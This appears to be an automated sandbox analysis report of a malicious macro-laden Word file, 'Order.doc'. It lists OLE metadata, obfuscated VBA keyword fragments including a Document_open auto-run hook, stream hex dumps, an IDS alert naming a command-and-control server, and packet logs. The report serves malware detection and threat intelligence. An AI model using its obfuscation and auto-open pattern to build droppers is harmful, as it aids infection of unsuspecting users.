                                            SHA512:33423d2027fa0d3f75555c6ca45a9b20934bcfb2dfb6e799a4a564feabfdec5680f94a2d093ebf0659eaedbaaff66e329801b7691560f4c0e163215b53748a84
                                            SSDEEP:1536:ANpHZTgQSz4w4K0vOYOcc2bqrQF7W5nKBf1Gxi:k1gQSU3K0hzqrQFa58G
                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "Order.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:Harum consequatur suscipit voluptatem explicabo placeat laborum. Est quidem sequi enim tenetur.
                                            Subject:
                                            Author:Margarita Lara
                                            Keywords:
                                            Comments:
                                            Template:
                                            Last Saved By:
                                            Revision Number:1
                                            Total Edit Time:0
                                            Create Time:2021-01-25 09:18:00
                                            Last Saved Time:2021-01-25 09:18:00
                                            Number of Pages:1
                                            Number of Words:5366
                                            Number of Characters:30587
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:-535
                                            Number of Lines:254
                                            Number of Paragraphs:71
                                            Thumbnail Scaling Desired:False
                                            Company:Gurule, Quintero cruz and Coln
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams with VBA

                                            VBA File Name: Jlzk8qsqcshl6jk, Stream Size: 14594
                                            General
                                            Stream Path:Macros/VBA/Jlzk8qsqcshl6jk
                                            VBA File Name:Jlzk8qsqcshl6jk
                                            Stream Size:14594
                                            Data ASCII:. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 45 ed dd ee 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            RzBkG
                                            Array((IcMvJH),
                                            woXMHFAWj:
                                            ndrons
                                            zaPgDlYE
                                            wefyBED
                                            EBzng
                                            TTSSDBE)
                                            ihJfBp
                                            Array((KTwdM),
                                            Const
                                            tfUFkPBI
                                            frXBRIAUC)
                                            ZDFvjGA
                                            BkXdJC
                                            Resume
                                            YoONRCDR
                                            Split(OhlNFI,
                                            VGJvOIo
                                            HKGPhf()
                                            Array((RCizEteb),
                                            Array((YoONRCDR),
                                            Array((tTYAKI),
                                            VGJvOIo:
                                            gHvzZ
                                            Ikdha
                                            AndgBCK()
                                            dGHeiB)
                                            IfwvovBbI:
                                            AndgBCK
                                            nXOBD
                                            LPhmsCuzH
                                            hpBCIH
                                            Array((RPnSaCJu),
                                            zWNhsCZ
                                            mxkikw
                                            "ndpns
                                            wPwsfD
                                            zrdcAzBue)
                                            pqwm,
                                            VCOQBBJME
                                            Array((cujVJONG),
                                            qabazEA
                                            SdmZKHA
                                            Array((jvKCCCN),
                                            xqRcJHJC
                                            bvWlGF
                                            Array((BjxaCGJ),
                                            BJuiHE()
                                            DfLwCIJs
                                            Array((szAVCX),
                                            YeFGHHg
                                            cujVJONG
                                            Array((QhLjEC),
                                            UdmGIddWE
                                            SwIwjFCGt
                                            vXKNhR()
                                            Array((nUCpSBGl),
                                            IAZNKNFF
                                            Range:
                                            NjfVZEH
                                            TtymyqHC
                                            "*high*,*critic*"
                                            RCizEteb
                                            SdmZKHA:
                                            RPnSaCJu
                                            kqPZDRGh
                                            xolsDFAoA
                                            UdmGIddWE)
                                            dxujxGCSH:
                                            kzJQDGJE
                                            eFJdCEIGJ
                                            TmaaI)
                                            GvzsBP
                                            aspdJ
                                            Split(eiWFHgJI,
                                            BJuiHE
                                            mjbBYHhbs
                                            mgbUQB:
                                            gFPNA()
                                            aRiqA
                                            VkIrTt
                                            YqzDYkkZ
                                            tFQrUF:
                                            UByHC
                                            FQbNABABD
                                            JoWtI
                                            String
                                            BcOIJEb
                                            LIhSwfESI
                                            ymBRCJA
                                            tFQrUF
                                            dDVvDFyJ
                                            Split(aspdJ,
                                            AEmiPt
                                            Nothing
                                            GwCvEyD
                                            Split(FwnlEcJ,
                                            mgbUQB
                                            HKGPhf
                                            dDVvDFyJ:
                                            PCZMFnb)
                                            Nbpclsvfxustc,
                                            nMrFDxBZ)
                                            qabazEA:
                                            Array((yoxbGFcFG),
                                            qckhE
                                            NRCfdB
                                            fcMsqBqHS
                                            WnGZXISGD
                                            Split(zWNhsCZ,
                                            mQJJC:
                                            UFSXB
                                            UFSXB)
                                            KTwdM
                                            Split(ymBRCJA,
                                            frXBRIAUC
                                            TWtrFHKBF
                                            nd:wns
                                            GpgYnI()
                                            Array((IzaGEVCD),
                                            CivKlI
                                            NPikOxWEE)
                                            tkDRHFKIL
                                            kOGmA)
                                            eFJdCEIGJ()
                                            JHxtqF
                                            NABiUJmBA
                                            PCZMFnb
                                            zrdcAzBue
                                            Split(gzqiCG,
                                            VkIrTt)
                                            dxujxGCSH
                                            gHvzZ)
                                            NRCfdB)
                                            UNxmoIDW()
                                            ndgmns
                                            BBKJHBtF
                                            EBzng)
                                            eBdxEG
                                            AEmiPt:
                                            Split(BkXdJC,
                                            QTrqHnpVB
                                            Split(QTrqHnpVB,
                                            ndinns
                                            kzJQDGJE()
                                            Array((FQbNABABD),
                                            Split(Ikdha,
                                            LIhSwfESI()
                                            nMrFDxBZ
                                            Mid(skuwd,
                                            Target)
                                            tTYAKI
                                            AsczD()
                                            gFPNA
                                            LIJNuGn
                                            xqRcJHJC()
                                            mpLEDLwAI)
                                            tkDRHFKIL()
                                            Split(kvSXRJ,
                                            mpLEDLwAI
                                            HJbpE:
                                            FwnlEcJ
                                            dGHeiB
                                            xhvKHu
                                            szAVCX
                                            URsHL()
                                            tllnMEB
                                            Split(wefyBED,
                                            Len(skuwd))
                                            RoGdiLo
                                            ZDFvjGA)
                                            xolsDFAoA)
                                            IAZNKNFF:
                                            kvSXRJ
                                            bhdApJCs
                                            BjxaCGJ
                                            Array((JoWtI),
                                            Split(liXWDHf,
                                            XCCUFUDF()
                                            woXMHFAWj
                                            Split(SwIwjFCGt,
                                            Array((ODzQPrd),
                                            Array((NABiUJmBA),
                                            ndmns
                                            Attribute
                                            OhlNFI
                                            uPBZMu
                                            JHxtqF()
                                            DOTbEvAC
                                            aRiqA:
                                            QhLjEC
                                            Split(RoGdiLo,
                                            URsHL
                                            Split(wrBNJ,
                                            ndsns
                                            nUCpSBGl
                                            OMnbClgE
                                            NjfVZEH:
                                            MemVBBC
                                            Array((TWtrFHKBF),
                                            WTESfHHbE
                                            jvKCCCN
                                            GwBkDZG
                                            TmaaI
                                            LIJNuGn:
                                            RzBkG)
                                            VB_Name
                                            Content
                                            uPBZMu:
                                            Split(DOTbEvAC,
                                            wxhyXoc
                                            Array((GvzsBP),
                                            Function
                                            ODzQPrd
                                            kYSmGCjDH
                                            lJxIKkhCA
                                            LPhmsCuzH()
                                            OMnbClgE:
                                            eiWFHgJI
                                            Error
                                            zaPgDlYE()
                                            MFOcG
                                            kOGmA
                                            ndtns
                                            Split(bvWlGF,
                                            YeFGHHg:
                                            UNxmoIDW
                                            IcMvJH
                                            nd_ns
                                            bhdApJCs)
                                            GpgYnI
                                            NPikOxWEE
                                            Array((nXOBD),
                                            yoxbGFcFG
                                            wGGXPWXvH
                                            BcOIJEb:
                                            IfwvovBbI
                                            qckhE:
                                            XCCUFUDF
                                            gzqiCG
                                            wrBNJ
                                            Split(WnGZXISGD,
                                            IzaGEVCD
                                            Split(DfLwCIJs,
                                            HJbpE
                                            Split(wGGXPWXvH,
                                            AsczD
                                            DWDXCYzB
                                            Mid(Application.Name,
                                            tllnMEB()
                                            mQJJC
                                            fcMsqBqHS)
                                            String:
                                            liXWDHf
                                            GwBkDZG()
                                            vXKNhR
                                            HiXlCAMl
                                            skuwd
                                            GwCvEyD()
                                            TTSSDBE
                                            VBA Code
                                            VBA File Name: Pc1nzntniqj_dur51, Stream Size: 704
                                            General
                                            Stream Path:Macros/VBA/Pc1nzntniqj_dur51
                                            VBA File Name:Pc1nzntniqj_dur51
                                            Stream Size:704
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . E . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 45 ed c9 27 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            VBA Code
                                            VBA File Name: Ynzysnuyyfihfq23d, Stream Size: 1174
                                            General
                                            Stream Path:Macros/VBA/Ynzysnuyyfihfq23d
                                            VBA File Name:Ynzysnuyyfihfq23d
                                            Stream Size:1174
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . c . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 45 ed 83 63 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            Document_open()
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                            General
                                            Stream Path:\x1CompObj
                                            File Type:data
                                            Stream Size:146
                                            Entropy:4.00187355764
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 328
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:328
                                            Entropy:3.23202847131
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 18 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 500
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:500
                                            Entropy:3.86071015332
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 5c 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00
                                            Stream Path: 1Table, File Type: data, Stream Size: 6881
                                            General
                                            Stream Path:1Table
                                            File Type:data
                                            Stream Size:6881
                                            Entropy:6.01925086237
                                            Base64 Encoded:True
                                            Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                            Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 531
                                            General
                                            Stream Path:Macros/PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:531
                                            Entropy:5.60149373099
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { D C 6 D B B 0 F - 4 4 C C - 4 3 0 C - 8 E B 1 - D C E F F 4 E 8 4 C 3 4 } " . . D o c u m e n t = Y n z y s n u y y f i h f q 2 3 d / & H 0 0 0 0 0 0 0 0 . . M o d u l e = P c 1 n z n t n i q j _ d u r 5 1 . . M o d u l e = J l z k 8 q s q c s h l 6 j k . . E x e N a m e 3 2 = " R w 9 v _ p l t f h q t u 0 d 2 w " . . N a m e = " m x " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F B F 9 B D 4 5 3 3 4 9 3 3 4 9 3 3 4 9 3 3 4
                                            Data Raw:49 44 3d 22 7b 44 43 36 44 42 42 30 46 2d 34 34 43 43 2d 34 33 30 43 2d 38 45 42 31 2d 44 43 45 46 46 34 45 38 34 43 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 59 6e 7a 79 73 6e 75 79 79 66 69 68 66 71 32 33 64 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 50 63 31 6e 7a 6e 74 6e 69 71 6a 5f 64 75 72 35 31 0d 0a 4d 6f 64 75 6c 65 3d 4a 6c 7a 6b 38 71 73 71 63 73 68
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 158
                                            General
                                            Stream Path:Macros/PROJECTwm
                                            File Type:data
                                            Stream Size:158
                                            Entropy:3.75845137034
                                            Base64 Encoded:False
                                            Data ASCII:Y n z y s n u y y f i h f q 2 3 d . Y . n . z . y . s . n . u . y . y . f . i . h . f . q . 2 . 3 . d . . . P c 1 n z n t n i q j _ d u r 5 1 . P . c . 1 . n . z . n . t . n . i . q . j . _ . d . u . r . 5 . 1 . . . J l z k 8 q s q c s h l 6 j k . J . l . z . k . 8 . q . s . q . c . s . h . l . 6 . j . k . . . . .
                                            Data Raw:59 6e 7a 79 73 6e 75 79 79 66 69 68 66 71 32 33 64 00 59 00 6e 00 7a 00 79 00 73 00 6e 00 75 00 79 00 79 00 66 00 69 00 68 00 66 00 71 00 32 00 33 00 64 00 00 00 50 63 31 6e 7a 6e 74 6e 69 71 6a 5f 64 75 72 35 31 00 50 00 63 00 31 00 6e 00 7a 00 6e 00 74 00 6e 00 69 00 71 00 6a 00 5f 00 64 00 75 00 72 00 35 00 31 00 00 00 4a 6c 7a 6b 38 71 73 71 63 73 68 6c 36 6a 6b 00 4a 00 6c 00
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4827
                                            General
                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                            File Type:data
                                            Stream Size:4827
                                            Entropy:5.51290275717
                                            Base64 Encoded:False
                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                            Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 637
                                            General
                                            Stream Path:Macros/VBA/dir
                                            File Type:data
                                            Stream Size:637
                                            Entropy:6.3067929208
                                            Base64 Encoded:True
                                            Data ASCII:. y . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . k . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                            Data Raw:01 79 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 13 6b fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                            Stream Path: WordDocument, File Type: data, Stream Size: 95711
                                            General
                                            Stream Path:WordDocument
                                            File Type:data
                                            Stream Size:95711
                                            Entropy:6.59080514362
                                            Base64 Encoded:True
                                            Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . q . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . b . . . b . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 71 94 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 df 75 01 00 62 7f 00 00 62 7f 00 00 71 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                            Stream Path: office, File Type: data, Stream Size: 1119
                                            General
                                            Stream Path:office
                                            File Type:data
                                            Stream Size:1119
                                            Entropy:7.82778611779
                                            Base64 Encoded:False
                                            Data ASCII:. ~ . h . . n . . . } v . . . 9 . . . . . D p 8 . . . . . W i . . . d . . . u b . . . . y . e . $ . ] a . ? < . . . . \\ C . . t . . . . . . 1 . I Y . . . ` . h . . . . . . . o . . . { A . . . . ! . { g F } x o i . 6 % K . . . i @ . . . { . . V u . . . . 0 ; . . . . C . . . I . . . . J ^ . @ . . . Z G > . . m . . . . . . . . . o R . . h j . } 2 . . U . . . } . . X . . . . . . . . < . . . . . 0 . . r # o n . . . . a . . . . < . . . . U . l . . x f . . G . . . . ( . . . j . I . . * . . . I 4 R 8 . y . . . : .
                                            Data Raw:d1 7e c4 68 de cf 6e 9f cb f9 7d 76 05 f4 a8 39 06 be bb b1 f1 44 70 38 96 81 8c e6 b4 57 69 80 af e6 64 fc 08 12 75 62 96 00 96 10 79 2e 65 0c 24 a0 5d 61 90 3f 3c 8d 0d 8c d1 5c 43 88 ea 74 90 fd c6 1e 8f ac 31 f4 49 59 1a f0 ae 60 be 68 1c 7f c1 13 f9 08 ef 6f a9 d7 ee 7b 41 18 1e 0e 15 21 80 7b 67 46 7d 78 6f 69 18 36 25 4b de ad cd 69 40 c4 c6 d6 7b 87 0e 56 75 b7 bd b5 b2 30

                                            Network Behavior

                                            Snort IDS Alerts

                                             Timestamp                  Protocol  SID      Message                                                Src Port  Dst Port  Source IP      Dest IP
                                             01/25/21-23:14:06.187776   TCP       2404322  ET CNC Feodo Tracker Reported CnC Server TCP group 12  49167     80        192.168.2.22   190.55.186.229

                                            Network Port Distribution

                                            TCP Packets

                                             Timestamp                            Src Port  Dst Port  Source IP       Dest IP
                                             Jan 25, 2021 23:13:52.280585051 CET  49165     80        192.168.2.22    172.217.6.174
                                             Jan 25, 2021 23:13:52.434391975 CET  80        49165     172.217.6.174   192.168.2.22
                                             Jan 25, 2021 23:13:52.434695005 CET  49165     80        192.168.2.22    172.217.6.174
                                             Jan 25, 2021 23:13:52.437289953 CET  49165     80        192.168.2.22    172.217.6.174
                                             Jan 25, 2021 23:13:52.591016054 CET  80        49165     172.217.6.174   192.168.2.22
                                             Jan 25, 2021 23:13:52.591087103 CET  80        49165     172.217.6.174   192.168.2.22
                                             Jan 25, 2021 23:13:52.591124058 CET  80        49165     172.217.6.174   192.168.2.22
                                             Jan 25, 2021 23:13:52.591306925 CET  49165     80        192.168.2.22    172.217.6.174
                                             Jan 25, 2021 23:13:52.666049957 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:52.707462072 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:52.707673073 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:52.716353893 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:52.756455898 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:52.760782003 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:52.760840893 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:52.761022091 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:52.777035952 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:52.817164898 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:52.817306042 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.027378082 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:53.061552048 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.061760902 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:53.069067001 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:53.109160900 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864087105 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864135981 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864173889 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864200115 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864238977 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864274025 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864317894 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864316940 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:53.864345074 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864384890 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864423990 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864449978 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864486933 CET  443       49166     104.21.88.166   192.168.2.22
                                             Jan 25, 2021 23:13:53.864525080 CET  49166     443       192.168.2.22    104.21.88.166
                                             Jan 25, 2021 23:13:53.864535093 CET  49166     443       192.168.2.22    104.21.88.166
